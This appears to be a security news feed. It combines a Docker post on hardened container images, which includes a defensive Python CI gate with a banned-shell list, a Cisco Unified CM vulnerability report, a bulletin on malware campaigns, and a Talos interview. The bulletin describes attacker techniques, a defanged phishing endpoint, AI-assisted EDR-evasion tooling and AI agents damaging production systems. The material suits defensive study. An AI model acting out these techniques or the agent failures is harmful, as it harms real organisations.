Thursday, June 4, 2026

Hardened Images Explained: Fewer CVEs, Smaller Attack Surface

When security teams scan their container environments for the first time, they often discover hundreds of known vulnerabilities, and almost none of them trace back to application code.

The overwhelming majority come from packages that shipped with the base image: shells, compilers, debug utilities, and libraries the application never calls. In a software supply chain built on containers, the base image is the foundation. If that foundation ships with unnecessary components, every workload built on top of it inherits the risk.

Hardened images address this problem at the source. They are purpose-built base images stripped down to only the runtime components an application needs, continuously patched, and shipped with verifiable metadata that lets security teams confirm exactly what is inside and how it was built.

Key takeaways

  • Most container vulnerabilities come from unnecessary packages inherited from base images, not from application code.
  • Hardened images strip out everything a containerized application does not need, reducing attack surface by up to 95%.
  • Beyond minimization, hardened images include verifiable supply chain metadata: SBOMs, build provenance, and exploitability data.
  • Container hardening differs from VM hardening; it focuses on image contents and build integrity, not OS-level configuration benchmarks.

Why standard container images carry hidden risk

A general-purpose base image like a standard Linux distribution might ship with 400 or more installed packages. A typical containerized application uses 20 to 30 of them. The rest are inherited baggage: package managers, text editors, network diagnostic tools, documentation files, and libraries for use cases the container was never intended to serve.

Each of those unused packages is a potential attack surface. Vulnerability scanners flag them because they are genuinely present in the image, even if the application never imports or executes them. The result is a signal-to-noise problem that burns through security team capacity. When a team faces 200 findings and 80% of them exist in packages no running workload touches, the real vulnerabilities that need immediate attention get buried in triage.

The packages themselves are the other half of the problem. A shell in a production container gives an attacker an interactive environment to work from if they achieve initial access. A package manager lets them install additional tooling. Debug utilities help them map the network and identify lateral movement targets. None of these belong in a production container, but they ship by default in most general-purpose base images, quietly expanding the blast radius of any breach.

What makes a container image “hardened”

So what are hardened images in practice? Minimization gets the most attention, but it’s only one of three requirements. A genuinely hardened image is also continuously maintained and independently verifiable.

Quick definition: Hardened images are minimal, continuously patched base images that ship only the runtime components an application needs, paired with verifiable supply chain metadata like SBOMs, build provenance, and cryptographic signatures.

Three pillars displayed as cards: Minimization (remove unused packages, reduce CVE surface, smaller attack footprint), Continuous Patching (automated base image updates, timely CVE remediation, rebuild triggers), and Verifiable Metadata (SBOMs, provenance attestations, signatures, VEX documents).

Minimized attack surface

The most visible characteristic of a hardened image is minimization. Shells, package managers, and debug tools are removed. Only the runtime components the application needs to function are included. This is more aggressive than simply choosing a slim base image variant. Hardened images are often rebuilt from the package level up, selecting each component deliberately rather than subtracting from a general-purpose distribution.

The result is a dramatically smaller CVE surface. Where a general-purpose image might carry hundreds of known vulnerabilities, a hardened equivalent for the same runtime typically carries single digits or none.

Continuous patching and rebuilds

A hardened image that’s never updated becomes a snapshot of the day it was built. An image hardened on Tuesday can start drifting by Friday: three upstream CVEs published, two library patches released, and the image is already accumulating the kind of exposure it was designed to prevent.

Security requires ongoing maintenance: monitoring upstream projects for fixes, rebuilding images to incorporate patches, and doing this on a defined cadence with clear SLAs. The best hardened images are rebuilt continuously, not on a quarterly or release-driven schedule. That’s what separates production-grade hardened images from one-time efforts to slim down a Dockerfile.

Verifiable supply chain metadata

This is where hardened images connect to the broader supply chain security best practices that organizations are adopting. A truly hardened image ships with:

  • Software Bills of Materials (SBOMs) that list every package, version, and dependency in the image
  • Build provenance attestations aligned to frameworks like SLSA, providing cryptographic proof of how and where the image was built
  • Vulnerability Exploitability eXchange (VEX) data that identifies which CVEs present in the image are not exploitable given how the software is actually configured
  • Cryptographic signatures that verify the image has not been tampered with between build and deployment

This metadata is what makes automated policy enforcement possible in CI/CD pipelines. A CI gate that blocks deployments unless the base image has a signed SBOM and valid provenance attestation is only feasible when the image provider builds that metadata into the supply chain from the start. For organizations operating in regulated environments, it’s also what allows security and compliance teams to verify an image without reverse-engineering its contents.
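
A sketch of the SBOM and VEX half of such a CI gate, added here as an illustration (it is not Docker's code or any scanner's API). It assumes signature and provenance verification already passed in an earlier pipeline step; the banned-package list, the CVE placeholders and the simplified CycloneDX-style and OpenVEX-style layouts are constructed for the example.

```python
import json

# Policy list (an assumption for this example): tools that give an intruder
# a shell, a package manager or a compiler inside a production container.
FORBIDDEN = {"bash", "dash", "busybox", "apt", "dpkg", "apk-tools", "gcc"}

# Constructed sample inputs. Package names, versions and CVE ids are
# placeholders; the JSON keeps only the fields this gate reads.
SBOM = json.loads("""
{"bomFormat": "CycloneDX", "specVersion": "1.5", "components": [
  {"name": "libssl3", "version": "3.0.0", "purl": "pkg:deb/debian/libssl3@3.0.0"},
  {"name": "zlib1g",  "version": "1.2.0", "purl": "pkg:deb/debian/zlib1g@1.2.0"},
  {"name": "bash",    "version": "5.2.0", "purl": "pkg:deb/debian/bash@5.2.0"}
]}""")

FINDINGS = [  # what a scanner reported for the image
    {"id": "CVE-0000-0001", "purl": "pkg:deb/debian/libssl3@3.0.0"},
    {"id": "CVE-0000-0002", "purl": "pkg:deb/debian/zlib1g@1.2.0"},
    {"id": "CVE-0000-0003", "purl": "pkg:deb/debian/zlib1g@1.2.0"},
    {"id": "CVE-0000-0004", "purl": "pkg:deb/debian/libxml2@2.9.0"},
]

VEX = json.loads("""
{"@context": "https://openvex.dev/ns/v0.2.0", "statements": [
  {"vulnerability": {"name": "CVE-0000-0001"},
   "products": [{"@id": "pkg:deb/debian/libssl3@3.0.0"}],
   "status": "not_affected",
   "justification": "vulnerable_code_not_in_execute_path"},
  {"vulnerability": {"name": "CVE-0000-0002"},
   "products": [{"@id": "pkg:deb/debian/zlib1g@1.2.0"}],
   "status": "not_affected"},
  {"vulnerability": {"name": "CVE-0000-0003"},
   "products": [{"@id": "pkg:deb/debian/zlib1g@1.2.0"}],
   "status": "under_investigation"}
]}""")


def forbidden_components(sbom):
    """Names of SBOM components the policy bans from production images."""
    return sorted(c["name"] for c in sbom.get("components", [])
                  if c["name"] in FORBIDDEN)


def vex_index(vex):
    """Map (vulnerability id, product purl) -> VEX statement."""
    index = {}
    for st in vex.get("statements", []):
        for prod in st.get("products", []):
            index[(st["vulnerability"]["name"], prod["@id"])] = st
    return index


def triage(findings, vex, sbom):
    """Split findings into blocking, VEX-suppressed and missing-from-SBOM."""
    index = vex_index(vex)
    known = {c["purl"] for c in sbom.get("components", [])}
    blocking, suppressed, unlisted = [], [], []
    for f in findings:
        if f["purl"] not in known:
            unlisted.append(f["id"])  # scanner saw a package the SBOM omits
            continue
        st = index.get((f["id"], f["purl"]))
        # A not_affected claim only counts when it says why.
        justified = st is not None and (
            st.get("justification") or st.get("impact_statement"))
        if st is not None and st["status"] == "not_affected" and justified:
            suppressed.append(f["id"])
        else:
            blocking.append(f["id"])
    return blocking, suppressed, unlisted


def gate(sbom, findings, vex):
    """Return (allowed, reasons); any reason blocks the deployment."""
    reasons = []
    banned = forbidden_components(sbom)
    if banned:
        reasons.append("forbidden components in SBOM: " + ", ".join(banned))
    blocking, _suppressed, unlisted = triage(findings, vex, sbom)
    if unlisted:
        reasons.append("findings on packages missing from SBOM: "
                       + ", ".join(unlisted))
    if blocking:
        reasons.append("findings without an accepted VEX statement: "
                       + ", ".join(blocking))
    return (not reasons, reasons)


if __name__ == "__main__":
    allowed, reasons = gate(SBOM, FINDINGS, VEX)
    print("ALLOW" if allowed else "BLOCK")
    for reason in reasons:
        print(" -", reason)
```

The unjustified `not_affected` statement and the finding on a package absent from the SBOM both block: the first is an unexplained suppression, the second means the SBOM is incomplete.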

Container hardening vs. VM hardening

The term “hardened image” appears in both container and virtual machine contexts, but the two practices address different layers of the stack.

Side-by-side comparison table with five rows: container hardening operates at the image layer with minimization, provenance, SBOMs, signatures, and VEX owned by app teams, while VM hardening operates at the OS layer with firewall rules, kernel parameters, CIS benchmarks, and user permissions owned by infra teams.

  • VM hardening focuses on OS configuration: disabling unnecessary services, tightening firewall rules, restricting user permissions, and tuning kernel parameters. Defined by frameworks like CIS Linux Benchmarks. Takes a full operating system and locks it down.
  • Container hardening operates at the image layer: what is packaged (minimization), how the image was assembled (provenance), and whether the contents are transparent (SBOMs and vulnerability data). Starts from a minimal foundation and builds up only what the application requires.

Both practices are valid and often coexist. Many organizations apply VM hardening to their container host nodes and container hardening to the images running on those nodes. They complement each other, but the techniques, tooling, and evaluation criteria are different. A CIS-hardened AMI and a hardened container base image solve distinct problems at distinct layers.

How to evaluate hardened images

Not all images marketed as hardened meet the same standards. When evaluating options, look for these characteristics:

  • Transparency: Can you see every package in the image? Is there a complete, machine-readable SBOM?
  • Provenance: Can you independently verify how and where the image was built? Are attestations signed and aligned to a recognized framework?
  • Patch cadence: How quickly are upstream security fixes incorporated? Is there a defined SLA, or is patching best-effort?
  • Compatibility: Do the images work as drop-in replacements in existing Dockerfiles and CI/CD pipelines, or do they require workflow changes?
  • Vulnerability data integrity: Does the provider suppress or filter CVE data to make the image look cleaner, or do they publish full vulnerability transparency with exploitability context?

The answers to these questions separate genuinely hardened images from images that are simply minimal. Minimization is necessary but not sufficient. Without provenance, patching discipline, and transparency, a small image is just a smaller attack surface with less visibility.

What hardened images are not

The term “hardened” is sometimes applied loosely, so it’s worth clarifying what does not qualify: each of these approaches solves part of the problem while leaving the rest exposed.

  1. Choosing a slim or Alpine variant reduces image size, but it does not address provenance, patching cadence, or supply chain metadata. The image is smaller, not hardened.
  2. Running a scanner and manually removing flagged packages produces a point-in-time fix, not a continuously maintained hardened image. The next upstream CVE puts you back where you started.
  3. Building a distroless image from scratch achieves minimization but requires significant ongoing effort to maintain patch currency across every image in a portfolio. Without a defined rebuild cadence and verifiable metadata, the maintenance burden scales with the number of images.

Hardening, in the supply chain security sense, means all of these concerns are addressed systematically: the image is minimal, maintained, and verifiable.

Getting started with hardened images

Hardened container images are becoming the standard foundation for secure container deployments. They address the root cause of most container vulnerability findings: unnecessary packages inherited from general-purpose base images. And with verifiable supply chain metadata, they give security teams the transparency and audit trail that modern compliance requirements demand.

Docker Hardened Images provide this foundation across several thousand images spanning runtimes, frameworks, databases, and infrastructure components. Every image ships with SBOMs, SLSA Build Level 3 provenance, VEX data, and cryptographic signatures. The Community tier is free and open under Apache 2.0 with no restrictions on use or redistribution.

Explore our full catalog of hardened images and start replacing your base images today.

Frequently asked questions

What is the difference between a hardened image and a minimal image?

A minimal image has fewer packages, but that’s only one dimension of hardening. A hardened image also includes continuous patching with defined SLAs, verifiable build provenance, complete SBOMs, and vulnerability exploitability data. Minimization reduces the attack surface; hardening ensures the remaining surface is maintained, transparent, and verifiable.

Do hardened images work with existing CI/CD pipelines?

Well-designed hardened images are built to serve as drop-in replacements for standard base images. If your Dockerfile starts with a general-purpose runtime image, you can typically swap in a hardened equivalent without changing your build process. The key consideration is shell access: some hardened images remove shells entirely, which means build steps that rely on shell commands may need adjustment for multi-stage builds.

How do hardened images reduce CVE counts?

Every package in a container image is a potential source of CVEs. By removing packages the application does not need, hardened images eliminate the vulnerabilities those packages carry. A general-purpose base image with 400 packages might have 200 known CVEs. A hardened equivalent with 30 packages might have fewer than 5, because the vast majority of vulnerable components were never included. This significantly shrinks the surface an attacker can target and reduces the triage burden on security teams.



from Docker https://ift.tt/oL4QOEJ

Cisco Patches CVE-2026-20230 in Unified CM as Exploit Code Goes Public

Cisco has patched a bug in Unified Communications Manager that lets an unauthenticated attacker on the network write files to the box and, from there, climb to root.

It is tracked as CVE-2026-20230, and proof-of-concept exploit code is already public. Cisco's PSIRT says it has not seen the flaw used in attacks yet. The PoC shortens that runway.

The flaw is a server-side request forgery. Unified CM and its Session Management Edition fail to validate certain HTTP requests properly, so a crafted request can push the server into writing arbitrary files onto the underlying OS. Those files are the foothold. Cisco says they can be used later to escalate to root, the top privilege on the system.

That two-step is why the score and the rating disagree. The CVSS base is 8.6: it scores the file write (an integrity-only impact, no confidentiality or availability loss) but not the root escalation that follows. Cisco rated the advisory Critical anyway, since the end state is full root.

There is one mitigating factor: the flaw only works when the WebDialer service is running, and WebDialer ships off by default. That does not help any deployment that has switched it on.

To check, open Cisco Unified CM Administration and switch to Cisco Unified Serviceability. Under Tools > Control Center - Feature Services, look at the Cisco WebDialer Web Service status in the CTI Services section. Started means you are exposed.

Patching is the only real fix. For the 14 train, that is 14SU6. For 15, the full Service Update (15SU5) is not due until September 2026, so until then, you are on the interim COP patch, or you turn WebDialer off (uncheck it under Tools > Service Activation and save). An independent researcher working with SSD Secure Disclosure reported the bug.

Unified CM has been a steady source of unauthenticated, root-level trouble. Last July, Cisco pulled a hard-coded root SSH account left in from development (CVE-2025-20309, CVSS 10).

In January, it patched an unauthenticated RCE across several of its voice products (CVE-2026-20045) that was already being exploited in the wild, enough for CISA to add it to its known-exploited list.

This one fits the pattern: a request that should never have reached anything sensitive, reaching it. With a PoC public and the 15-train fix months out, assume someone turns that file-write into a working attack before the patches are everywhere.



from The Hacker News https://ift.tt/NrjP0oH

ThreatsDay Bulletin: AI Agents Gone Wrong, Sketchy C2 Tools, ClickFix Tricks, JS Backdoors & 20+ New Stories

It got stupid again.

The internet still feels held together with tape. Bad plugins, old bugs, fake tools, trusted apps doing shady things. Same mess, new wrapper. And now the weird stuff is normal. Forums go down and come back worse. Cheap hackers get better toys. AI starts breaking real systems. Great.

Read the whole thing before it ruins your week anyway.

  1. Unauthenticated SSRF risk

    Cisco has released fixes to address a high-severity security flaw in Unified Communications Manager (CVE-2026-20230, CVSS score: 8.6) that could allow an unauthenticated, remote attacker to conduct server-side request forgery (SSRF) attacks through an affected device. "This vulnerability is due to improper input validation for specific HTTP requests," Cisco said. "An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to write files to the underlying operating system that could be used later to elevate to root." The issue has been addressed in Cisco Unified CM and Unified CM SME Release versions 14SU6 and 15SU5. Cisco said it's aware of the availability of proof-of-concept exploit code for the flaw, but noted there is no evidence of active exploitation. It credited an independent security researcher working with SSD Secure Disclosure for reporting the vulnerability.

  2. Mobile spyware operation

    Russia's Federal Security Service (FSB) has disclosed details of what it described as a "large-scale action" undertaken by foreign intelligence services to stealthily implant spyware on the mobile devices of high-ranking officials in the country. "This software was utilized to exfiltrate existing data, intercept ongoing conversations, and conduct covert audio and video surveillance of the immediate surroundings of the electronic devices, with the ultimate objective of obtaining sensitive information," the FSB said. Russia did not reveal who was behind the attacks, but noted the "representatives of foreign intelligence services" leveraged the technical capabilities of major international IT corporations to exfiltrate sensitive data from the devices. This specifically included the exploitation of mobile communication channels, the agency added. An investigation into the activity is ongoing, with the FSB also initiating a criminal case to investigate the matter.

  3. Layered keylogger lures

    Threat actors have been relying on social engineering over the past few months to push VIP Keylogger via loaders written in JavaScript, batch scripts, and Visual Basic Script (VBS). "Attackers are masquerading as legitimate business communications such as bank payment notifications, procurement orders, and logistics updates to lure users into opening malicious files," Splunk said.

  4. Crypto sanctions escalation

    The U.S. Treasury's Office of Foreign Assets Control (OFAC) has announced sanctions against Nobitex, Iran's largest cryptocurrency exchange, for facilitating payments related to terrorist activities. "Nobitex has provided significant support to the regime, processing more than 50 percent of all Iranian digital asset inflows in 2025 and facilitating payments tied to Iran's terrorist activities, sanctions evasion efforts, and Islamic Revolutionary Guard Corps (IRGC)-linked transactions, including activity associated with IRGC-affiliated ransomware actors," the Treasury said. The sanctions also extend to Nobitex's chairman, co-founder, and former CEO, Amir Hossein Rad, as well as other Nobitex leaders and officials, and three other exchanges: Wallex, Bitpin, and Ramzinex. According to Chainalysis, Nobitex processed over 50% of all Iranian digital asset inflows last year. The four exchanges accounted for roughly $7.7 billion, 78% of Iran's USD 9.9 billion in attributed 2025 crypto volume, per TRM Labs.

  5. Cybercrime forum fallout

    The July 2025 law enforcement takedown of XSS, a prominent Russian-speaking cybercrime forum, didn't dismantle the ecosystem. Rather, it fractured it into competing, harder-to-track factions, Flashpoint said. The collapse has triggered an exodus into new, unvetted, and often adversarial communities. Some of the new forums that have rushed to fill up the void left by XSS include DamageLib (launched by legacy moderators of XSS), Rehub (launched by another former XSS moderator), XSS.pro (a resurrection using old backups and suspected to be a law-enforcement honeypot), and XSSF (started by a pro-Russian Telegram hacking group).

  6. RMM abuse surge

    A lesser-known remote desktop tool called Tiflux is being used in a growing number of attacks to establish persistence, transmit screenshots, and run commands to collect system profiling information. "Threat actors behind the rogue Tiflux incidents also installed UltraVNC, an open-source remote access tool, sideloaded other commercial RMMs, including Splashtop and ScreenConnect, and installed an outdated driver that can permit the threat actor to elevate their own privileges on an infected system," Huntress said. "Threat actors continue to test and weaponize the use of commercial remote access management tools."

  7. Malware delivery network

    A threat cluster tracked as DriveSurge has been operating large-scale malware distribution campaigns using ClickFix and FakeUpdates (aka SocGholish) social engineering techniques on compromised sites. Thousands of websites are estimated to have been compromised, directing users to malicious infrastructure. DriveSurge primarily acts as an initial access broker (IAB) operating on a pay-per-install (PPI) model, enabling follow-on attacks. Visitors of compromised websites are steered through a traffic distribution system (TDS) known as zTDS, which profiles the system and decides whether the visitor should be served a ClickFix or a FakeUpdates lure. zTDS, in use since at least 2015, is publicly available at ztds[.]info. "Using zTDS, DriveSurge hijacks thousands of legitimate, high-reputation websites and silently redirects visitors to malware, unbeknownst to the sites' owners or their visitors," Silent Push said. The campaign has been active since September 2025.

  8. Sensitive data leak

    The Spanish National Police has arrested an unidentified individual for leaking sensitive information related to members of various critical state organizations, including the National Cybersecurity Institute (INCIBE), the State Attorney General's Office, the National Police, the Civil Guard, and the National Security Council.

  9. JavaScript backdoor malspam

    Intrinsec has disclosed that multiple malspam campaigns have been used to distribute a JavaScript-coded backdoor. "The targets of those campaigns were from all regions and sectors, notably energy and finance ministries, including in the CIS region," the company said. "We believe the campaigns to be financially motivated and operated for email account compromise (EAC) and/or business email compromise (BEC)." The activity was observed in March 2026.

  10. On-chain malware delivery

    Cybersecurity researchers have flagged an intrusion in which threat actors used the EtherHiding technique to route ClearFake payload delivery through smart contracts on the BNB Smart Chain testnet. "The attack chain ended with two simultaneously deployed stealers, SectopRAT and ACRStealer, alongside an on-chain execution tracker that confirmed each victim compromise in real time," Trend Micro said.

  11. Cloud attack tradecraft

    Nation-state hacking groups like APT29, APT33, and UTA0355 are exploiting ROADtools, a Python-based open-source framework for red-teaming and research, to blend in with normal traffic and evade detection. "ROADtools operates through legitimate Microsoft APIs and can mimic typical traffic," Palo Alto Networks Unit 42 said. "Further defense evasion can be achieved by configuring request attributes such as user-agent strings. These capabilities have made ROADtools a valuable asset for attackers. Nation-state threat actors have used it in recent cloud intrusions for discovery, persistence, and defense evasion. Attackers involved in a targeted phishing campaign in early 2025 used tooling that matches ROADtools' token management capabilities."

  12. Data-only extortion rises

    Pure data-exfiltration campaigns that pressure victims without deploying ransomware are on the rise. In 2025, such attacks have primarily targeted professional services, healthcare, and consumer services firms. "Interestingly, while manufacturing remains the single most disrupted sector overall, construction has witnessed a 44% year-over-year increase as a data-only extortion hotspot," Unit 42 said. "These firms are attractive targets due to lucrative financial blueprints and bidding data combined with data egress controls."

  13. AI-assisted evasion testing

    An unknown threat actor has been observed using artificial intelligence (AI) technologies to automate Active Directory discovery and refine endpoint detection and response (EDR) evasion tactics in a red team post-exploitation framework. "Analysis revealed that AI for malware development was more limited and was mainly used to coordinate workflows and support experimentation," Sophos said. "The actual EDR-bypass path was a structured engineering test cycle that included human review and iteration." To develop tools for bypassing EDR agents, the attacker is said to have used Cursor and Anthropic Claude Opus. At the core of the framework is a Python tool that generates Go and Rust payloads for testing with an aim to resist sandboxing, antivirus, and EDR detection. This approach was used to build nearly 80 modules covering more than 70 techniques. Also attributed to the threat actor are Python-based malware development scripts for injecting shellcode into legitimate Windows executables and a Telegram bot API-based external command and control (C2) mechanism. "The use of AI agents to accelerate tool development and test evasion techniques lowers the barrier to entry for sophisticated red team-style attacks," Sophos said. "However, this shift does not change how defenders should protect themselves." The framework is said to be built for stealthy post-exploitation activity in target environments, linking it to "known ransomware deployment and data theft operations."

  14. Steam-hosted malware payloads

    A newly identified malware is using Steam Community profile comments to host malicious payloads for WordPress, hiding malicious infrastructure behind Valve's legitimate platform. "The malware employs invisible Unicode characters to conceal payloads within Steam profile comments, enabling steganographic data encoding that evades traditional text-based detection methods," GoDaddy said. "A cookie-authenticated backdoor enables remote code execution, allowing attackers to modify plugin and theme files by sending base64-encoded PHP code via POST requests." The malware performs two primary functions, including client-side JavaScript injection, which fetches encoded URLs from Steam profile comments, decodes them, and injects external JavaScript into WordPress pages, and a server-side backdoor that provides cookie-authenticated remote access for modifying PHP files across plugins and themes. The campaign was first detected in July 2025. The malware has been detected on approximately 1,980 WordPress sites. It is unclear how the websites are breached, but it's assessed that the initial infection vector could be stolen admin logins, compromised FTP/SFTP credentials, the exploitation of a vulnerable WordPress theme or plugin, or a supply chain compromise.

  15. Trusted tools abused

    Flare.io has disclosed details of FalkonC2, a commercial hacking tool that appears designed to hide inside enterprise environments by abusing trusted remote access software. "FalkonC2 has an enterprise version called Rotemelli2 that runs in memory, rotates its command-and-control domains every 72 hours, and uses tools such as ScreenConnect, Datto, and SimpleHelp to quietly launch attacks," the company said in a statement. An analysis of dashboard telemetry suggests active enterprise infections across the U.S., Australia, the Netherlands, and Poland. The framework also checks infected machines for QuickBooks and Sage50 data, suggesting attackers are looking for accounting systems they can quickly exfiltrate.

  16. AI vulnerability surge

    Anthropic is broadening access to its Project Glasswing program, adding approximately 150 organizations in 15 countries for access to its Claude Mythos Preview. "The bottleneck in cybersecurity is now verifying, disclosing, and patching the large numbers of vulnerabilities that Mythos-class models can surface," the company said. The growing number of flaws identified with the help of AI models has shifted the scales from discovery to patching. A recent report from the Cloud Security Alliance (CSA), the SANS Institute, and the Open Worldwide Application Security Project (OWASP) concluded that in the near term, organizations are "likely to be overwhelmed" by threat actors using AI to find and exploit vulnerabilities faster than defenders can patch them. "The cost and capability floor to exploit discovery is dropping, the time between disclosure and weaponization is compressing toward zero, and capabilities that previously required nation-state resources are now becoming broadly accessible," the report said.

  17. Linux flaw under attack

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a Linux Kernel flaw (CVE-2022-0492, CVSS score: 7.8) to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to remediate the flaw by June 5, 2026. "Linux Kernel contains an improper authentication vulnerability which could allow for privilege escalation via the cgroups v1 release_agent feature," CISA said. The development comes after Kaspersky said it observed the flaw, along with CVE-2019-5736 and CVE-2024-21626, being exploited in attacks aimed at container environments.

  18. Fake image tools deliver malware

    A new ClickFix-style lure is being dressed up as free image-editing tools to deliver CastleLoader, which then drops both NetSupport RAT and a custom .NET stealer called CastleStealer. "The sites look like every other 'remove your photo background' service with uploads, progress bars, and download buttons, but the entire UI is fake," Huntress said. The activity has been codenamed BackgroundFix. CastleLoader is attributed to a threat cluster known as GrayBravo.

  19. Session theft defense

    Google has revealed that Device Bound Session Credentials (DBSC) in the Chrome browser is now generally available and enabled by default for Google Workspace users. "DBSC strengthens account security after users are logged in and helps bind a session cookie - small files used by websites to remember user information - to the device a user authenticated from," Google said. "Even if malware was present on the user's device, DBSC reduces the risk of session theft and makes it meaningfully more difficult for malicious actors to exploit stolen session cookies." The feature was formally released in April 2026.

  20. Adobe abused in phishing

    Cybercriminals are weaponizing Adobe infrastructure in a LinkedIn phishing campaign that steals passwords and redirects victims to the legitimate LinkedIn site afterward. Opening an HTML attachment in the email message serves a login form urging the recipient to enter their credentials. The captured information is delivered to the domain "lnkd.tt.omtrdc[.]net/rest/v1/delivery," after which they are redirected to the LinkedIn site. "This domain belongs to Adobe and is associated with the Adobe Target A/B testing platform," Malwarebytes said. "But the campaign isn't using Adobe Target to receive the phished credentials. Instead, attackers are abusing Adobe Target as a redirect/abuse point in the phishing flow."

  21. Supply chain delay defense

    RubyGems has included a cooldown, a time-based filter, in Bundler version 4.0.13 that refuses to resolve to a version until it has been public for at least "N" days. "Releases too new to have been scrutinized are passed over in favor of ones that have aged past the window," Hiroshi Shibata, RubyGems maintainer, said. "It is opt-in, and complements rather than replaces existing defenses like mandatory 2FA and trusted publishing." Users can declare a "small cooldown" on the source in the Gemfile. The efforts go along with other initiatives like AI-assisted vulnerability scanning against the most critical gems in the registry.

  22. Iran-linked Israel attacks

    ESET said it recorded an unusual spike in Iran-aligned activity against Israeli targets between October 2025 and March 2026 that could not be linked to previously known groups. "Two unattributed activity clusters, Rusty Boots and MoKhargosh, demonstrated both espionage capabilities and destructive potential - including deployment of a bootkit-style wiper and retaining destructive tooling for later use - whereas a third, MOØN Badr, appears to have been limited to targeted espionage," the Slovakian company said. MoKhargosh, first observed in January 2026, used Go-compiled binaries in attacks targeting Israel. This includes a backdoor called GoKhargosh, along with wipers, filecoders that overwrite files with junk data, and a wiper that targets the master boot record to render the system unbootable. MOØN Badr, on the other hand, singled out three unidentified victims in Israel in early January 2026 to deliver the MOØN AGENT backdoor via phishing emails to facilitate command execution and file uploads and downloads.

  23. Fuel tank systems exposed

    The U.S. government has issued an advisory urging organizations to take steps to defend against attacks targeting U.S.-based automatic tank gauge (ATG) systems by securing them with strong passwords and by removing them from the internet to reduce public exposure. The activity, which remains unattributed, involves the attackers compromising internet-exposed ATG systems via hard-coded credentials, command execution, and SQL injection vectors, followed by escalating privileges to obtain full administrator rights and modifying the system functions. "Should a cyber threat actor exploit these vulnerabilities and compromise an ATG system, they could disrupt or manipulate the below critical functions by interfacing directly with the tank management as though they possessed legitimate physical access to the system console," government agencies said.

  24. Verified call defense

    Google has announced a fake call detection feature, built on Rich Communication Services (RCS), for Android devices running Android 12 and later that verifies whether a call is coming from the caller's actual Android smartphone. Enabled by default, the alert is designed to help users avoid falling victim to deepfake impersonation and call spoofing in real time. "When a contact calls you and you're both using Phone by Google, their device sends a silent confirmation signal in real time to your device to verify the call is legitimate and truly coming from the contact's device," Google said. "If a scammer tries to impersonate your contact, that initial confirmation signal will be missing. Your device will instantly notice this and ping your contact's actual device to double-check. If their real device says, 'I'm not making a call right now,' you'll get a warning on your screen advising you to hang up immediately." Because the digital handshake uses end-to-end encrypted RCS technology, Google said the process is completely private. That said, the feature requires users to have three Google apps installed: Phone by Google, Contacts, and Google Messages. It will roll out globally this month, starting with Pixel devices.

  25. Agentic AI failures

    An analysis of 7,200 publicly reported AI-security and operational incidents has identified "344 verified enterprise-relevant agent-inflicted damage cases between September 2023 and May 2026, including 188 incidents where autonomous AI systems caused direct organizational harm without any external attacker involvement," Cyera researchers Ehud Halamish, Assaf Morag, and Vladimir Tokarev said. "The majority of confirmed incidents involved real production impact rather than theoretical AI risk scenarios. Observed outcomes included deleted databases, destructive cloud actions, unauthorized financial operations, runaway API spending, service outages, exposed secrets, and silent integrity corruption inside enterprise environments. As agents gain broader permissions and deeper integration into SaaS, cloud, development, and business environments, the AI interaction layer itself increasingly becomes part of the enterprise attack surface and critical data perimeter."

The lesson is boring because the lesson is always boring. Patch faster, kill exposed admin panels, stop trusting "safe" tools by name, and watch the weird edges where attackers like to hide. The cheap stuff still works because too many teams leave it cheap.

Security is not magic. It is inventory, logs, least privilege, backups, tested restores, and people who notice when something normal starts acting wrong. Do that well, and half this mess gets a lot less exciting. That is the point.



from The Hacker News https://ift.tt/VCOF57a
via IFTTT

Winning the cyber marathon with Tony Giandomenico

In the high-speed world of cybersecurity, the difference between a breach and a breakthrough often comes down to endurance. Tony Giandomenico, Senior Director of Product Management with Cisco Talos, joins me to discuss how he balances the intensity of leading major product launches with the grueling discipline of Ironman triathlons.

Beyond the technical specs and new threat hunting features, this conversation dives deep into the human side of leadership. Tony shares his hard-won lessons on the power of communication, the importance of knowing your "why," and how to navigate the complexities of a 30-year career without losing your focus.

Amy Ciminnisi: You have been in the thick of the cyber security world for a while now, and a lot of things have shifted in this field. So what has been the biggest surprise for you, and what keeps you excited about leading the charge on the product side?

Tony Giandomenico: Well, I would probably say that the biggest shift over the last six months has been the increased rate of the capabilities of these frontier models. I'm the first one not to jump on the bandwagon of this stuff, because I've been doing this for about 30 plus years or so, but I think this feels a little different. The capabilities are increasing, and I think what that means to cybersecurity is a big shift. How do we deal with all that? From the adversary side, they're actually breaking in the networks like they typically do. They're moving laterally within the environment. They're evading different types of security controls. Finding vulnerabilities, exploiting those vulnerabilities, all of that stuff.

It's also going to be supercharged on the defensive side. Of course, you don't bring a knife to a gun fight, right? You're going to use the same AI technology — you know, the same frontier models — to speed things up there as well. From the product management side, I think we're going to see the things that we would have previously seen five years down the road a lot sooner. And that's what kind of excites me about everything — that opportunity to explore the art of possibility is a lot more at your fingertips where it wasn't necessarily before.

AC: We specifically lined this episode up with the Cisco Talos Threat Hunting launch, which you played a major role in. For people who aren't familiar, can you explain what it is?

TG: Threat hunting is where we're looking for different types of threats that are circumventing our existing security control alerts, detection mechanisms, and so on. When defenders invest in these different types of technologies that are automatically detecting alerts or threats in your environment, the challenge that they have is the sensitivity meter. If they set it to be too high, the team might get inundated with false positives, and then that particular product isn't really worth that investment because you constantly have to investigate those. So the sensitivity meter has to find some place in the middle. That's where it gives these stealthy threat actors a place to live. So you have a combination of AI and human-in-the-loop services, where we build hypotheses to identify actors that may have actually already circumvented your security controls.

Currently, we're hunting in the endpoint telemetry side (e.g., Secure Endpoint) that we offer our customers today. With this expansion, we're expanding it out to our flagship firewall product. So we'll be hunting within Secure Firewall as well as identity, which actually includes Duo and CII, which is Cisco Identity Intelligence.

AC: How do you keep your cool and stay focused on the why behind the work when you're dealing with the intensity of a major launch?

TG: Before coming to Cisco, I had a small cybersecurity consulting company for about 10 years or so out in the Hawaiian Islands. I had the domain expertise, but I had to learn financial aspects, sales, and marketing. I also had to understand what makes people tick. I wasn't able to talk to every individual the same way to get them on board with things. So the biggest thing that I took away when I went from running my business to working in a larger organization was that when folks are in different departments, there are competing priorities and I have to influence them. I have to get them to understand and believe in the vision. So if you go in there with that mindset, knowing that it's not going to flow exactly how you envisioned, things just work out.





from Cisco Talos Blog https://ift.tt/nK4txCd
via IFTTT

Hypotheses, telemetry, and human judgment: Inside Cisco Talos Threat Hunting

By Ron Scott-Adams

